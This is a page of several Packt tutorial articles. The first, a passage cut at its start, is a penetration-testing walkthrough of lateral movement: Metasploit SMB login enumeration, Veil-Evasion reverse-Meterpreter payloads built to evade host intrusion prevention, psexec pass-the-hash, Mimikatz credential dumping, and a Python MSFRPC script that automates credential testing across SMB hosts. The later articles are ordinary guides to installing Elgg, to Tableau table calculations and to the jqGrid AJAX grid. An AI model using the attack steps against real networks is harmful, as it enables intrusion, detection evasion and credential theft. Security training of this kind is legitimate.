The bad point is that you cannot load multiple usernames and passwords into it; that capability is reserved for the smb_login module. The problem with smb_login is that it is extremely noisy, as many signature detection tools flag this method of testing for logins. A third module, smb_enumusers, can also be used, but it only provides details about local users, since it identifies users based on the contents of the Security Accounts Manager (SAM) file. So, if a user has a Domain account and has logged into the box, the smb_enumusers module will not identify them. Understand each module and its limitations when identifying targets for lateral movement. We are going to highlight how to configure the smb_enumusers_domain module and execute it. This will show an example of gaining access to a vulnerable host and then verifying Domain Admin (DA) account membership. This information can then be used to identify where a DA is located so that Mimikatz can be used to extract credentials. For this example, we are also going to use a custom exploit built with Veil to attempt to bypass a resident Host Intrusion Prevention System (HIPS). More information about Veil can be found at https://github.com/Veil-Framework/Veil-Evasion.git. So, we configure the module to use the password batman, and we target the local administrator account on the system. This can be changed, but often the default is used. Since it is the local administrator, the Domain is set to WORKGROUP. The following figure shows the configuration of the module: Before running commands such as these, make sure to use spool to write the results to a log file so you can go back and review them. As you can see in the following figure, the account provided details about who was logged into the system. This means that there are logged-in users relevant to the returned account names and that the local administrator account will work on that system.
This means this system is ripe for compromise by a Pass-the-Hash (PtH) attack. The psexec module allows you to pass either the extracted LAN Manager (LM):NT LAN Manager (NTLM) hash and username combination or just the username and password pair to get access. To begin with, we set up a custom multi/handler to catch the custom exploit we generated with Veil, as shown in the following figure. Keep in mind that I used 443 for the local port because it bypasses most HIPS, and that the local host will change depending on your host. Now, we need to generate custom payloads with Veil to be used with the psexec module. You can do this by navigating to the Veil-Evasion installation directory and running it with python Veil-Evasion.py. Veil has a good number of payloads that can be generated with a variety of obfuscation or protection mechanisms; to see the available payloads, execute the list command. You can select a payload by typing in its number or its name. As an example, run the following commands to generate a C Sharp stager that does not use shellcode; keep in mind that this requires specific versions of .NET on the target box to work. use cs/meterpreter/rev_tcp set LPORT 443 set LHOST 192.168.195.160 set use_arya Y generate There are two components to a typical payload: the stager and the stage. A stager sets up the network connection between the attacker and the victim. Payloads written in a system's native languages can often be pure stagers. The second part is the stage, which consists of the components downloaded by the stager, such as Meterpreter. If both items are combined, the payload is called a single; think of the malicious Universal Serial Bus (USB) drives you create, which often use singles. The output will be an executable that will spawn an encrypted reverse HyperText Transfer Protocol Secure (HTTPS) Meterpreter.
The payload can be tested with the checkvt script, which safely verifies whether the payload would be picked up by most HIPS solutions. It does this without uploading the payload to VirusTotal, so it does not add the payload to the database that many HIPS providers pull from. Instead, it compares the hash of the payload to those already in the database. Now, we can set up the psexec module to reference the custom payload for execution. Update the psexec module so that it uses the custom payload generated by Veil-Evasion, via set EXE::Custom, and disable the automatic payload handler with set DisablePayloadHandler true, as shown in the following figure: Exploit the target box, and then attempt to identify who the DAs are in the Domain. This can be done in one of two ways: either by using the post/windows/gather/enum_domain_group_users module or by running the following command from shell access. net group "Domain Admins" We can then grep through the spooled output file from the previously run module to locate relevant systems that might have these DAs logged into them. When gaining access to one of those systems, there would likely be DA tokens or credentials in memory, which can be extracted and reused. The following command is an example of how to search the log file for these types of entries. grep <username> <spoolfile.log> As you can see, this very simple exploit path allows you to identify where the DAs are. Once you are on the system, all you have to do is load mimikatz and extract the credentials, typically with the wdigest command, from the established Meterpreter session. Of course, this means the system has to be newer than Windows 2000 and have active credentials in memory. If not, it will take additional effort and research to move forward. To highlight this, we use our established session to extract credentials with Mimikatz, as you can see in the following figure. The credentials are in memory, and since the target box was a Windows XP machine, we have no conflicts and no additional research is required.
In addition to the intelligence we have gathered by extracting the active DA list from the system, we now have another set of confirmed credentials that can be used. Rinsing and repeating this method of attack allows you to quickly move laterally around the network until you identify viable targets. Automating the exploit train with Python This exploit train is relatively simple, but we can automate a portion of it with the Metasploit Remote Procedure Call (MSFRPC). This script will use the nmap library to scan for hosts with port 445 active, and then generate a list of targets to test using a username and password passed as arguments to the script. The script will use the same smb_enumusers_domain module to identify boxes that have the credentials reused and other viable users logged into them. First, we need to install the SpiderLabs msfrpc library for Python. This library can be found at https://github.com/SpiderLabs/msfrpc.git. The script we are creating uses the netifaces library to identify which IP addresses belong to your host's interfaces. It then scans for port 445, the SMB port, on the IP address, range, or Classless Inter-Domain Routing (CIDR) address. It eliminates any IP addresses that belong to your interfaces and then tests the credentials using the Metasploit module auxiliary/scanner/smb/smb_enumusers_domain. At the same time, it verifies which users are logged onto the system. In addition to the real-time responses, the script outputs two files: a log file that contains all the responses, and a file that holds the IP addresses of all the hosts that have SMB services. This Metasploit module takes advantage of RPCDCE, which does not run on port 445, but we are verifying that the service is available for follow-on exploitation.
This file could then be fed back into the script if you, as an attacker, find other credential sets to test, as shown in the following figure: Lastly, the script can be passed hashes directly, just like the Metasploit module, as shown in the following figure: The output will be slightly different for each run of the script, depending on the console identifier you grab to execute the command. The only real difference will be the additional banner items typical of a Metasploit console initiation. A couple of things have to be stated here. Yes, you could just generate a resource file, but when you start getting into organizations that have millions of IP addresses, this becomes unmanageable. MSFRPC can also have resource files fed directly into it, but this can significantly slow the process. If you want to compare, rewrite this script to do the same test as the previous ssh_login.py script you wrote, but with direct MSFRPC integration. As with all scripts, the required libraries need to be imported. You are already familiar with most of these; the newest one is the MSFRPC library by SpiderLabs. The required libraries for this script are as follows: import os, argparse, sys, time try: import msfrpc except ImportError: sys.exit("[!] Install the msfrpc library that can be found here: https://github.com/SpiderLabs/msfrpc.git") try: import nmap except ImportError: sys.exit("[!] Install the nmap library: pip install python-nmap") try: import netifaces except ImportError: sys.exit("[!] Install the netifaces library: pip install netifaces") We then build a function to identify the relevant targets that the auxiliary module is going to be run against. First, we set up the initial variables and the passed parameters. Notice that we have two service names to test against in this script, microsoft-ds and netbios-ssn, as either one could represent port 445 based on the nmap results.
def target_identifier(verbose, dir, user, passwd, ips, port_num, ifaces, ipfile): hostlist = [] pre_pend = "smb" service_name = "microsoft-ds" service_name2 = "netbios-ssn" protocol = "tcp" port_state = "open" bufsize = 0 hosts_output = "%s/%s_hosts" % (dir, pre_pend) After that, we create the nmap scanner and configure it to scan either the hosts listed in a file or the hosts given on the command line. Notice that the hostlist is a string of all the addresses loaded from the file, separated by spaces. The ipfile is opened and read, and all newlines are replaced with spaces as they are loaded into the string. This is a requirement for the hosts argument of the nmap library. scanner = nmap.PortScanner() if ipfile != None: if verbose > 0: print("[*] Scanning for hosts from file %s") % (ipfile) with open(ipfile) as f: hostlist = f.read().replace('\n',' ') scanner.scan(hosts=hostlist, ports=port_num) else: if verbose > 0: print("[*] Scanning for host(s) %s") % (ips) scanner.scan(ips, port_num) open(hosts_output, 'w').close() hostlist=[] if scanner.all_hosts(): e = open(hosts_output, 'a', bufsize) else: sys.exit("[!] No viable targets were found!") The IP addresses of all the interfaces on the attack system are removed from the test pool. for host in scanner.all_hosts(): for k,v in ifaces.iteritems(): if v['addr'] == host: print("[-] Removing %s from target list since it belongs to your interface!") % (host) host = None Finally, the details are written to the relevant output file and Python list, and then returned to the caller.
if host != None: e = open(hosts_output, 'a', bufsize) if service_name in scanner[host][protocol][int(port_num)]['name'] or service_name2 in scanner[host][protocol][int(port_num)]['name']: if port_state in scanner[host][protocol][int(port_num)]['state']: if verbose > 0: print("[+] Adding host %s to %s since the service is active on %s") % (host, hosts_output, port_num) hostdata=host + "\n" e.write(hostdata) hostlist.append(host) else: if verbose > 0: print("[-] Host %s is not being added to %s since the service is not active on %s") % (host, hosts_output, port_num) e.close() if hosts_output: return hosts_output, hostlist The next function creates the actual command that will be executed; it will be called for each host the scan returned as a potential target. def build_command(verbose, user, passwd, dom, port, ip): module = "auxiliary/scanner/smb/smb_enumusers_domain" command = "use " + module + "\nset RHOSTS " + ip + "\nset SMBUser " + user + "\nset SMBPass " + passwd + "\nset SMBDomain " + dom + "\nrun\n" return command, module The last function actually initiates the connection with MSFRPC and executes the relevant command for each specific host. def run_commands(verbose, iplist, user, passwd, dom, port, file): bufsize = 0 e = open(file, 'a', bufsize) done = False The script creates a connection with MSFRPC, creates a console, and then tracks it by its console_id. Do not forget that msfconsole can have multiple sessions, so we have to track our session by its console_id. client = msfrpc.Msfrpc({}) client.login('msf','msfrpcpassword') try: result = client.call('console.create') except: sys.exit("[!] Creation of console failed!") console_id = result['id'] console_id_int = int(console_id) The script then iterates over the list of IP addresses that were confirmed to have an active SMB service and creates the necessary commands for each of those IP addresses.
for ip in iplist: done = False if verbose > 0: print("[*] Building custom command for: %s") % (str(ip)) command, module = build_command(verbose, user, passwd, dom, port, ip) if verbose > 0: print("[*] Executing Metasploit module %s on host: %s") % (module, str(ip)) The command is then written to the console, and we wait for the results. client.call('console.write',[console_id, command]) time.sleep(1) while done != True: We await the results of each command execution, verifying the data that has been returned and checking that the console is not still busy. If it is, we delay reading the data. Once it has completed, the results are written to the specified output file. result = client.call('console.read',[console_id_int]) if len(result['data']) > 1: if result['busy'] == True: time.sleep(1) continue else: console_output = result['data'] e.write(console_output) if verbose > 0: print(console_output) done = True We close the file and destroy the console to clean up. e.close() client.call('console.destroy',[console_id]) The final pieces of the script set up the arguments and the initial variables and call the functions. These components are similar to previous scripts and have not been included here for the sake of space, but the details can be found at the previously mentioned location on GitHub. The last requirement is loading msgrpc in msfconsole with the password we want. So, launch msfconsole and then execute the following within it. load msgrpc Pass=msfrpcpassword The command was not mistyped: Metasploit has moved from msfrpc to msgrpc, but everyone still refers to it as msfrpc. The big difference is that msgrpc sends MessagePack-encoded data in HTTP POST requests, while msfrpc used eXtensible Markup Language (XML). All of this can be automated with resource files to set up the service. Summary In this article, we highlighted a manner in which you can move through a sample environment.
Specifically, we showed how to exploit a relevant box, escalate privileges, and extract additional credentials. From that position, we identified other viable hosts we could laterally move into and the users who were currently logged into them. We generated custom payloads with the Veil Framework to bypass HIPS, and executed a PtH attack. This allowed us to extract other credentials from memory with the tool Mimikatz. We then automated the identification of viable secondary targets and the users logged into them with Python and MSFRPC.



Packt

28 Oct 2009

14 min read

Elgg Social Networking - Installation


Installing Elgg In addition to its impressive feature list, Elgg is an admin's delight. In this tutorial by Mayank Sharma, we will see how Elgg can be installed on the popular web application stack of Linux, Apache, MySQL, and PHP, fondly referred to as LAMP. As Apache, MySQL, and PHP can run under the Windows operating system as well, you can also set up Elgg in such an environment. Setting Up LAMP Let's look at setting up the Linux, Apache, MySQL, PHP web server environment. There are several reasons for the LAMP stack's popularity. While most people enjoy the freedom offered by this open source software, small businesses and non-profits will also be impressed by its procurement cost: $0. Step 1: Install Linux The critical difference between setting up Elgg under Windows or Linux is installing the operating system. The Linux distribution I'm using to set up Elgg is Ubuntu Linux (http://www.ubuntu.com/). It's available as a free download and has a huge and active global community, should you run into any problems. Covering step-by-step installation of Ubuntu Linux is too much of a digression for this tutorial. Ubuntu isn't difficult to install, and because of its popularity there is plenty of installation and usage documentation available all over the Web. Linux.com has a set of videos that detail the procedure of installing Ubuntu (http://www.linux.com/articles/114152). Ubuntu has a dedicated help section (https://help.ubuntu.com/) covering an introduction to and general usage of the distribution. Step 2: Install Apache Apache is the most popular web server used on the Internet. Reams of documentation have been written on installing Apache under Linux. Apache's documentation sub-project (http://httpd.apache.org/docs-project/) has information on installing various versions of Apache under Linux. Ubuntu, which is based on another popular Linux distribution, Debian, uses a very powerful and user-friendly packaging system.
It's called apt-get and can install an Apache server within minutes. All you have to do is open a terminal and run this command (as root, or prefixed with sudo), telling apt-get what to install:
apt-get install apache2 apache2-common apache2-doc apache2-mpm-prefork apache2-utils libapr0 libexpat1 ssl-cert
This will download Apache and its most essential libraries. Next, you need to enable some of Apache's most critical modules:
a2enmod ssl
a2enmod rewrite
a2enmod include
The rewrite module is critical to Elgg, so make sure it's enabled; otherwise Elgg won't work properly. That's it. Now, just restart Apache with:
/etc/init.d/apache2 restart
Step 3: Install MySQL Installing MySQL isn't much of an issue either. Like Ubuntu and Apache, MySQL can boast a strong and dedicated community. This means there's no dearth of MySQL installation or usage documentation (http://www.mysql.org/doc/). If you're using MySQL under Ubuntu, like me, installation is just a matter of giving apt-get a set of packages to install:
apt-get install mysql-server mysql-client libmysqlclient12-dev
Finally, set up a password for the MySQL root user with:
mysqladmin -h yourserver.example.com -u root password yourrootmysqlpassword
Step 4: Install PHP Support You might think I'm exaggerating here, but I'm not: PHP is one of the most popular and easy-to-learn languages for writing web applications. Why do you think we are setting up our Linux web server environment to execute PHP? It's because Elgg itself is written in PHP! And so are countless other web applications. So I'm sure you've guessed by now that PHP has a good deal of documentation (http://www.php.net/docs.php) as well.
You've also guessed that it's now time to call upon Ubuntu's apt-get package manager to set up PHP:
apt-get install libapache2-mod-php5 php5 php5-common php5-gd php5-mysql php5-mysqli
As you can see, in addition to PHP, we are also installing packages that will hook up PHP with the MySQL database and the Apache web server. That's all there is to setting up the LAMP architecture to power your Elgg network. Setting Up WAMP If you are used to Microsoft's Windows operating system, or want to avoid the small extra learning curve involved in setting up a web server on a Linux distribution (especially if you haven't done it before), you can easily replicate the Apache, MySQL, PHP web server on a Windows machine. Cost-wise, all the server components (the Apache web server, the MySQL database, and the PHP development language) have freely available Windows versions as well. But the base component of this stack, the operating system (Microsoft Windows), isn't free. Versions of Apache, MySQL, and PHP for Windows are all available from the same websites mentioned above. As Windows doesn't have an apt-get kind of utility, you'd have to download and install all three components from their respective websites, but there is an easier way to set up a WAMP server. There are several prepackaged Apache, MySQL, and PHP software bundles available for Windows (http://en.wikipedia.org/wiki/Comparison_of_WAMPs). I've successfully run Elgg on the WAMP5 bundle (http://www.en.wampserver.com/). The developer updates the bundle regularly to make sure it's running the latest versions of all the server components included in it. Note - While WAMP5 requires no configuration, make sure you have Apache's rewrite_module and PHP's php_gd2 extension enabled. They will have a bullet next to their name if they are enabled. If the bullet is missing, click on the respective entries under the Apache and PHP sub-categories and restart WAMP5.
Installing Elgg Now that we have a platform ready for Elgg, let's move on to the most important step: setting up Elgg. Download the latest version of Elgg from its website. At the time of writing this tutorial, the latest version of Elgg was Elgg-0.8. Elgg is distributed as a zipped file. To uncompress under Linux: Move this zipped file to /tmp and uncompress it with the following command:
$ unzip /tmp/elgg-0.8.zip
To uncompress under Windows: Right-click on the ZIP file and select the Extract here option. After uncompressing the ZIP file, you should have a directory called Elgg-<version-number>, in my case, elgg-0.8/. This directory contains several subdirectories and files. The INSTALL file contains detailed installation instructions. The first step is to move this uncompressed directory to your web server. Note: You can set up Elgg on your own web server connected to the Internet or on a paid web server in a data center anywhere on the planet. The only difference between the two setups is that if you don't have direct access to the web server, you'll have to contact the web service provider and ask about the transfer options available to you. Most probably, you'll have FTP access to your web server, and you'll have to use one of the dozens of freely available FTP clients to transfer Elgg's files from your computer to the remote web server. Optionally, if you have "shell" access on the web server, you might want to save time by transferring just the zipped file and unzipping it on the web server itself. Contact your web server provider for this information. The web server directory into which you need to copy the contents of the Elgg directory depends upon your Apache installation and operating system. In Ubuntu Linux, the default web server directory is /var/www/. In Windows, WAMP5 asks where it should create this directory during installation. By default, it's the www directory, created within the directory you installed WAMP5 under.
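Where you do have shell access and Python 3.8 or later on the server, the unzip-and-copy step described above can also be scripted. The following is a minimal sketch, not part of Elgg: the function name deploy_elgg and its subdir parameter are hypothetical, and it assumes the archive holds a single top-level directory such as elgg-0.8/.

```python
import shutil
import tempfile
import zipfile
from pathlib import Path


def deploy_elgg(zip_path, web_root, subdir=None):
    """Unzip an Elgg release and copy its contents into the web root.

    Assumes the archive holds one top-level directory (e.g. elgg-0.8/).
    With subdir=None the files land directly in web_root; otherwise they
    land in web_root/subdir.
    """
    target = Path(web_root) / subdir if subdir else Path(web_root)
    with tempfile.TemporaryDirectory() as tmp:
        # Extract into a scratch directory first, then copy only the contents.
        with zipfile.ZipFile(zip_path) as archive:
            archive.extractall(tmp)
        top_level = [p for p in Path(tmp).iterdir() if p.is_dir()]
        if len(top_level) != 1:
            raise ValueError("expected one top-level directory in the archive")
        # dirs_exist_ok=True (Python 3.8+) allows copying into an existing www/.
        shutil.copytree(top_level[0], target, dirs_exist_ok=True)
    return target
```

For the Ubuntu layout described above, a call might look like deploy_elgg("/tmp/elgg-0.8.zip", "/var/www", subdir="elgg"), run by a user allowed to write to /var/www; leaving subdir out copies the files straight into the web root instead.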
Note: Another important decision you need to make while installing Elgg is how you want your users to access your network. If you're setting up the network to be part of your existing web infrastructure, you'll need to install Elgg inside a directory. If, on the other hand, you are setting up a new site just for the Elgg-powered social network, copy the contents of the Elgg directory into the www directory itself and not into a subdirectory. Once you have the Elgg directory within your web server's www directory, it's time to set things in motion. Start by renaming the config-dist.php file to config.php and the htaccess-dist file to .htaccess. Simply right-click on the file and give it a new name, or use the mv command in this format:
$ mv <original-file-name> <new-file-name>
Note: To rename htaccess-dist to .htaccess in Windows, you'll have to open the htaccess-dist file in Notepad, go to File | Save As, and specify the name as ".htaccess", including the quotes. Editing config.php Believe it or not, we've completed the "installation" bit of setting up Elgg. But we still need to configure it before throwing the doors open to visitors. Not surprisingly, all this involves is creating a database and editing the config.php file to our liking. Creating a Database Making an empty database in MySQL isn't difficult at all. Just enter the MySQL interactive shell using the username, password, and hostname you specified while installing MySQL:
$ mysql -u root -h localhost -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 9 to server version: 5.0.22-Debian_0ubuntu6.06.3-log
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> CREATE DATABASE elgg;
You can also create a MySQL database using a graphical front-end manager like phpMyAdmin, which comes with WAMP5. Just look for a database field, enter a new name (Elgg), and hit the Create button to create an empty Elgg database.
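The two renames described above can also be done with a short script, which should sidestep the Notepad workaround on Windows, because Python renames the file directly rather than through Windows Explorer. This is an illustrative sketch only: activate_config_files is a hypothetical helper, and it assumes you point it at the directory that holds config-dist.php and htaccess-dist.

```python
from pathlib import Path

# Distribution file -> active file, as named in the text.
RENAMES = {
    "config-dist.php": "config.php",
    "htaccess-dist": ".htaccess",
}


def activate_config_files(elgg_dir):
    """Rename Elgg's distribution config files inside elgg_dir.

    Returns the paths that were created. A target that already exists is
    skipped, so an edited config.php is never overwritten. A missing source
    file raises FileNotFoundError.
    """
    created = []
    for src_name, dst_name in RENAMES.items():
        src = Path(elgg_dir) / src_name
        dst = Path(elgg_dir) / dst_name
        if dst.exists():
            continue  # keep the existing, possibly edited, file
        src.rename(dst)
        created.append(dst)
    return created
```

Running activate_config_files("/var/www/elgg") a second time is harmless: files that already exist are skipped and an empty list is returned.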
Initial Configuration Elgg has a front-end interface to set up config.php, but there are a couple of things you need to do before you can use that interface: Create a data directory outside your web server root. As described in the configuration file, this is a special directory where uploaded files will go. It's also advisable to create this directory outside your main Elgg install. This is because this directory will be writable by everyone accessing the Elgg site, and having such a "world-accessible" directory under your Elgg installation is a security risk. If you call the directory elgg-data, make it world-writable with the following command:
$ chmod 777 elgg-data
Set up an admin username and password. Before you can access Elgg's configuration web front-end, you need an admin user and a password. For that, open the config.php file in your favorite text editor and scroll down to the following variables:
$CFG->adminuser = "";
$CFG->adminpassword = "";
Specify your chosen admin username and password between the quotes, so that it looks something like this:
$CFG->adminuser = "admin";
$CFG->adminpassword = "765thyr3";
Make sure you don't forget the username and password of the admin user. Important Settings When you have created the data directory and specified an admin username and password, it's time to go ahead with the rest of the configuration. Open a web browser and point it to http://<your-web-server>/<Elgg-installation>/elggadmin/ This will open up a simple web page with lots of fields. All fields have a title and a brief description of the kind of information you need to fill in. There are some drop-down lists as well, from which you have to select one of the listed options. Here are all the options and their descriptions:
Administration panel username: Username to log in to this admin panel in future to change your settings.
Admin password: Password to log in to this admin panel in future.
Site name: Enter the name of your site here (e.g.
Elgg, Apcala, University of Bogton's Social Network, etc.).
Tagline: A tagline for your site (e.g. Social network for Bogton).
Web root: External URL to the site (e.g. http://elgg.bogton.edu/).
Elgg install root: Physical path to the files (e.g. /home/Elggserver/httpdocs/).
Elgg data root: This is a special directory where uploaded files will go. If possible, this should live outside your main Elgg installation (you'll need to create it by hand). It must have world-writable permissions set and have a final slash at the end. Note: Even in Windows, where we use backslashes (\) to separate directories, use Unix's forward slashes (/) to specify the path to the install root, data root, and other path names. For example, if you have Elgg files under WAMP's default directory in your C drive, use this path: C:/wamp/www/elgg/.
Database type: Acceptable values are mysql and postgres; MySQL is highly recommended.
System administrator email: The email address your site will send emails from (e.g. elgg-admin@bogton.edu).
News account initial password: The initial password for the 'news' account. This will be the first administrator user within your system, and you should change the password immediately after the first time you log in.
Default locale: Country code to set the language to if you have gettext installed.
Public registration: Can general members of the public register for this system?
Public invitations: Can users of this system invite other users?
Maximum users: The maximum number of users in your system. If you set this to 0, you will have an unlimited number of users.
Maximum disk space: The maximum disk space taken up by all uploaded files.
Disable public comments: Set this to true to force users to log in before they can post comments, overriding the per-user option. This is a handy sledgehammer-to-crack-a-nut tactic to protect against comment spam (although an Akismet plug-in is available from elgg.org).
Email filter: Anything you enter here must be present in the email address of anyone who registers; e.g. @mycompany.com will only allow email addresses from mycompany.com to register.
Default access: The default access level for all new items in the system.
Disable user templates: If this is set, users can only choose from available templates rather than defining their own.
Persistent connections: Should Elgg use persistent database connections?
Debug: Set this to 2047 to get ADOdb error handling.
RSS posts maximum age: Number of days for which to keep incoming RSS feed entries before deleting them. Set this to 0 if you don't want RSS posts to be removed.
Community create flag: Set this to admin if you would like to restrict the ability to create communities to admin users.
cURL path: Set this to the path of the cURL executable if cURL is installed; otherwise leave it blank. Note: According to Wikipedia, cURL is a command line tool for transferring files with URL syntax, supporting FTP, FTPS, HTTP, HTTPS, TFTP, SCP, SFTP, Telnet, DICT, FILE, and LDAP. The main purpose and use of cURL is to automate unattended file transfers or sequences of operations. For example, it is a good tool for simulating a user's actions at a web browser. Under Ubuntu Linux, you can install cURL using the following command:
apt-get install curl
Templates location: The full path of your Default_Template directory.
Profile location: The full path to your profile configuration file (usually, it's best to leave this in mod/profile/).
Finally, when you're done, click on the Save button to save the settings. Note: The next version of Elgg, Elgg 0.9, will further simplify installation. An early release candidate of this version (elgg-0.9rc1) is already a lot more straightforward to install and configure for initial use. First Log In Now, it's time to let Elgg use these settings and set things up for you. Just point your browser to your main Elgg installation (http://<your-web-server>/<Elgg-installation>).
It'll connect to the MySQL database and create some tables, then load some basic data, before taking you to the main page. On the main page, you can log in to your Elgg installation using the news account and the password you specified for it during configuration.
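If the first log in does not go smoothly, the path settings entered on the configuration page are one thing worth re-checking. The sketch below encodes the rules stated in the setting descriptions above: forward slashes even on Windows, a final slash on the data root, a world-writable data root, and a data root that lives outside the install root. The helpers to_elgg_path and check_data_root are hypothetical and not part of Elgg, and the permission test assumes a Unix host such as the Ubuntu setup used here.

```python
import stat
from pathlib import Path, PureWindowsPath


def to_elgg_path(path):
    """Return path in the form the settings ask for: forward slashes, final slash.

    Example: C:\\wamp\\www\\elgg -> C:/wamp/www/elgg/
    """
    posix = PureWindowsPath(path).as_posix()
    return posix if posix.endswith("/") else posix + "/"


def check_data_root(data_root, install_root):
    """List problems with a data root setting; an empty list means none found.

    The permission check reads Unix mode bits, so it is only meaningful on
    Linux/Unix hosts.
    """
    problems = []
    if "\\" in data_root:
        problems.append("use forward slashes, not backslashes")
    if not data_root.endswith("/"):
        problems.append("data root must end with a slash")
    data = Path(data_root).resolve()
    install = Path(install_root).resolve()
    # "If possible, this should live outside your main Elgg installation."
    if data == install or install in data.parents:
        problems.append("data root should live outside the Elgg install root")
    if not data.is_dir():
        problems.append("data root does not exist (create it by hand)")
    elif not data.stat().st_mode & stat.S_IWOTH:
        problems.append("data root is not world-writable")
    return problems
```

For example, check_data_root("/var/elgg-data/", "/var/www/elgg/") returns an empty list when that directory exists with chmod 777 permissions, and to_elgg_path("C:\\wamp\\www\\elgg") yields the C:/wamp/www/elgg/ form used in the WAMP example.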



Amarabha Banerjee

14 Feb 2018

4 min read

Hands on Table Calculation Techniques with Tableau


This article is a book excerpt from the title Mastering Tableau written by David Baldwin. This book will help you master the intricacies of Tableau to create effective data visualizations. Today, we shall explore table calculation techniques in Tableau and work through a real-world example of using them. In this article, we provide a simple schema for understanding table calculations. This schema is communicated via two questions: What is the function? How is the function applied? These two questions are inextricably connected. You cannot reliably apply something until you know what it is, and you cannot get useful results from something until you apply it correctly. The sections below will help you get a head start on table calculation techniques and on using Tableau functions effectively to implement table calculations. Basics of Table Calculation Calculated fields can be categorized as row level, aggregate level, and table level. For row- and aggregate-level calculations, the underlying data source engine does most (if not all) of the computational work, and Tableau merely visualizes the results. For table calculations, Tableau also relies on the underlying data source engine to execute computational tasks; however, after that work is completed and a dataset is returned, Tableau performs additional processing before rendering the results. This can be seen within the following process flow diagram, in the circled part titled Tableau performs additional processing. This is where table calculations are processed. We will continue with a definition: A table calculation is a function performed on a dataset in cache that has been generated as a result of a query from Tableau to the data source. Let's consider a couple of points regarding the dataset in cache mentioned in the preceding definition. First, it is important to understand that this cache is not simply the returned results of a query.
Tableau may adjust the returned results. For example, Tableau may expand the cache via data densification. Secondly, it's important to consider how the cache is structured. Basically, the dataset in cache is a table and, like all tables, is made up of rows and columns. This is particularly important for table calculations, since a table calculation may be computed as it moves along the cache. Such a table calculation is directional. Alternatively, a table calculation may be computed based on the entire cache with no directional consideration. Table calculations such as this are non-directional. Directional and non-directional table calculations will be considered more fully in the following section.

Directional and non-directional table calculation functions

As of Tableau 10, there are 32 table calculation functions in Tableau. However, many of these are simply variations on a theme; for example, there are five Running functions, including RUNNING_SUM and RUNNING_AVG. If we narrow our consideration to unique groups of table calculation functions, we will discover that there are only 11. The following table shows these 11 functions organized in two categories:

As mentioned previously, non-directional table calculation functions operate on the entire cache and thus are not computed based on movement through the cache. For example, the SIZE function doesn't change based on the value of a previous row in the cache. On the other hand, RUNNING_SUM does change based on previous rows in the cache and is therefore considered directional.

Practical Example

In this example, we'll see directional and non-directional table calculation functions in action:

1. Navigate to https://public.tableau.com/profile/david1..baldwin#!/ to locate and download the workbook associated with this chapter.
2. Navigate to the worksheet entitled Directional/Non-Directional.
3. Create the following calculated fields:
4. Place Category and Ship Mode on the Rows shelf.
5. Double-click on Sales, Lookup, Size, Window Sum, Window Sum w/Start&End, and Running Sum to populate the view.
6. Compare the following screenshot with the notes in step 3 of this exercise for better understanding:

We discussed techniques for implementing table calculations with Tableau. If you liked our post, be sure to check out Mastering Tableau, which covers other useful data visualization and data analysis techniques.
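The directional/non-directional distinction can be mimicked outside Tableau. The following Python sketch is an illustration only, not Tableau's implementation: it assumes the cache is a plain list of aggregated Sales values (made-up numbers) and re-implements SIZE, RUNNING_SUM, and a LOOKUP-style offset, with None standing in for the NULL that Tableau returns when the target row does not exist.

```python
from typing import List, Optional


def size(cache: List[float]) -> List[int]:
    """Non-directional: every row gets the same value, the number of rows in the cache."""
    return [len(cache)] * len(cache)


def running_sum(cache: List[float]) -> List[float]:
    """Directional: each row's value depends on the rows that came before it."""
    out: List[float] = []
    total = 0.0
    for value in cache:
        total += value
        out.append(total)
    return out


def lookup(cache: List[float], offset: int) -> List[Optional[float]]:
    """Value `offset` rows away from each row; None (Tableau's NULL) past the edges."""
    n = len(cache)
    return [cache[i + offset] if 0 <= i + offset < n else None for i in range(n)]


# Hypothetical aggregated Sales values, one per row of the view.
sales = [100.0, 250.0, 50.0, 400.0]

print(size(sales))               # [4, 4, 4, 4]
print(running_sum(sales))        # [100.0, 350.0, 400.0, 800.0]
print(lookup(sales, -1))         # [None, 100.0, 250.0, 50.0]
# Walking the cache in the opposite direction changes RUNNING_SUM but not SIZE.
print(running_sum(sales[::-1]))  # [400.0, 450.0, 700.0, 800.0]
```

Reversing the order of the cache is a quick way to tell the two kinds apart: a non-directional result is unchanged, a directional one is not.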


article-image-implementing-ajax-grid-using-jquery-data-grid-plugin-jqgrid

Packt

05 Feb 2010

9 min read

Implementing AJAX Grid using jQuery data grid plugin jqGrid

In this article by Audra Hendrix, Bogdan Brinzarea and Cristian Darie, authors of AJAX and PHP: Building Modern Web Applications 2nd Edition, we will discuss the usage of an AJAX-enabled data grid plugin, jqGrid.

One of the most common ways to render data is in the form of a data grid. Grids are used for a wide range of tasks, from displaying address books to controlling inventories and logistics management. Because centralizing data in repositories has multiple advantages for organizations, it wasn't long before a large number of Internet and intranet applications were being built to manage data by using data grids. But compared to their desktop cousins, online applications using data grids were less than stellar: they felt cumbersome and time consuming, were not always easy to implement (especially when you had to control varying access levels across multiple servers), and, from a usability standpoint, time lags during page reloads, sorts, and edits made online data grids a bit of a pain to use, not to mention the resources that all of this consumed.

As you are a clever reader, you have undoubtedly surmised that you can use AJAX to update the grid content; we are about to show you how to do it! Your grids can update without refreshing the page, cache data for manipulation on the client (rather than asking the server to do it over and over again), and change their looks with just a few keystrokes! Gone forever are the blinking pages of partial data and sessions that time out just before you finish your edits. Enjoy!

In this article, we're going to use a jQuery data grid plugin named jqGrid. jqGrid is freely available for private and commercial use (although your support is appreciated) and can be found at: http://www.trirand.com/blog/. You may have guessed that we'll be using PHP on the server side, but jqGrid can be used with many other server-side technologies.
On the client side, the grid is implemented using the jQuery JavaScript library and JSON. The look and style of the data grid will be controlled via CSS using themes, which make changing the appearance of your grid easy and very fast. Let's start looking at the plugin and at how easily your newly acquired AJAX skills enable you to add functionality to any website. Our finished grid will look like the one in Figure 9-1:

Figure 9-1: AJAX Grid using jQuery

Let's take a look at the code for the grid and get started building it.

Implementing the AJAX data grid

The files and folders for this project can be obtained directly from the code download (chapter 9) for this article, or can be created by typing them in. We encourage you to use the code download to save time and for accuracy. If you choose to do so, there are just a few steps you need to follow:

1. Copy the grid folder from the code download to your ajax folder.
2. Connect to your ajax database and execute the product.sql script.
3. Update config.php with the correct database username and password.
4. Load http://localhost/ajax/grid to verify that the grid works; it should look just like Figure 9-1.

You can test the editing feature by clicking on a row, making changes, and hitting the Enter key. Figure 9-2 shows a row in editing mode:

Figure 9-2: Editing a row

Code overview

